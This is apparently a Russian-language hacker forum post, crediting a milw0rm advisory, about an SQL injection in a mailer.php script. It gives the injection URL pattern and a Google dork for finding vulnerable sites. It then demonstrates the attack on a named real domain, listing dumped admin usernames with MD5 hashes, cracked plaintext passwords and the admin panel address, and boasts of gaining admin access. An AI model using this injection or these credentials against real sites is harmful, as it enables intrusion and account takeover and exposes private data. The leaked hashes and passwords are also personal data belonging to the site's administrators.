Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных сценарием mailer.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Код:
http://[site]/mailer.php?to=[sql]
При этом вывода на экран нет, однако взглянув на исходный код страницы и посмотрев значение скрытой переменной "to" мы получим нужную инфу из базы.
Поиск в Гугл: inurl:"mailer.php?to"
Пример:
Цель:_paslek.com
Логин и пасс из таблицы админы мы вытащили, меняем limit и тянем остальные:
Red:b60e60bca1b299873cd7ff99013aba6d
Toudi:1bb23c088b74cc52b9d6e0737ba5c3c0
Wyga:2e5649795423dc0f85b359dc94718b5d
- - - - - - - - - - - - - - - - - - - - -
брутим MD5 хэши... получаем:
Pawel:0309dd0f7ef7607d3525c7f0ce6d382d:psikutas
Red:b60e60bca1b299873cd7ff99013aba6d:f4444ero
Далее ищем админку (я нашёл с 1 раза ;-)
Код:
_http://paslek.com/admin.php
Вводим первый логин и пасс и с удивлением обнаруживаем себя админом сайта Ну а дальше сами...
P.S. Это наглядный пример использования уязвимости, представлен только для ознакомления, все незаконные действия совершаемые Вами могут быть уголовно наказуемы и вся ответственность за неправоменрные действия лежит на вас.
Autor (обнаружил уязвимость): Kacper (а пример взлома мой ;-)
www.milw0rm.com